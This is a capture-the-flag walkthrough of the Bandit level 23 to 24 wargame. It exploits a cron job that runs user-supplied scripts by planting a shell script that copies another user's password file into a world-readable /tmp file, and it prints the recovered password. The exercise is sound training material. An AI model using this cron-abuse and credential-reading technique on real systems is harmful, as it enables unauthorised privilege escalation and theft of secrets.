## Bandit Level 23 → Level 24

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

- The early steps are just the same as the previous two challenges. Let's skip it, and let's just read the contents of `cronjob_bandit24.sh`

In [ ]:
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
shopt -s nullglob
myname=$(whoami)

cd /var/spool/"$myname"/foo || exit
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." ] && [ "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" "./$i")"
        if [ "${owner}" = "bandit23" ] && [ -f "$i" ]; then
            timeout -s 9 60 "./$i"
        fi
        rm -rf "./$i"
    fi
done

- Now, let's imagine bandit24 automatically runs this script in background. We can see that it executes scripts under the `var/spool/bandit24/foo`. After executing it, it will delete it. Now to "crack" this, we need to put a script inside the said directory. That script must have the payload to copy the password. Take note that the current user will always have access to its own password in `/etc/banditpass/..`

- First, let's create a directory in the `/tmp` directory so that we can create a script file. It is also worth noting that we need to change the directory's permission so that any user (`bandit 24` in this case) can write and read from this directory. 

In [ ]:
bandit23@bandit:~$ mkdir -p /tmp/b24_get_pw
bandit23@bandit:/tmp/b24_get_pw$ chmod 777 /tmp/b24_get_pw

- Let's create the script

In [ ]:
bandit23@bandit:/tmp/b24_get_pw$ touch get_pw.sh
bandit23@bandit:/tmp/b24_get_pw$ nano get_pw.sh

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/b24_get_pw/b24_pw
chmod 666 /tmp/b24_get_pw/b24_pw

- We also need to add an `execute` permission to this script file. We can do this by

In [ ]:
chmod +x get_pw.sh

- Then, we can copy this script to the `var/spool/bandit24/foo` directory, so that it can be run by `bandit24` in the background

In [ ]:
cp ./get_pw.sh /var/spool/bandit24/foo

- Since the cronjob runs on an interval, we must wait until the script is successully executed. Use `ls -l` to check if the password file was already copied from the `bandit_pass`

In [ ]:
bandit23@bandit:/tmp/b24_get_pw$ ls -l
total 8
-rw-rw-rw- 1 bandit24 bandit24  33 Jan 26 06:09 b24_pw
-rwxrwxr-x 1 bandit23 bandit23 100 Jan 26 06:03 get_pw.sh

- Let's read the content of the file to reveal the password for the next level

In [ ]:
bandit23@bandit:/tmp/b24_get_pw$ cat b24_pw
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8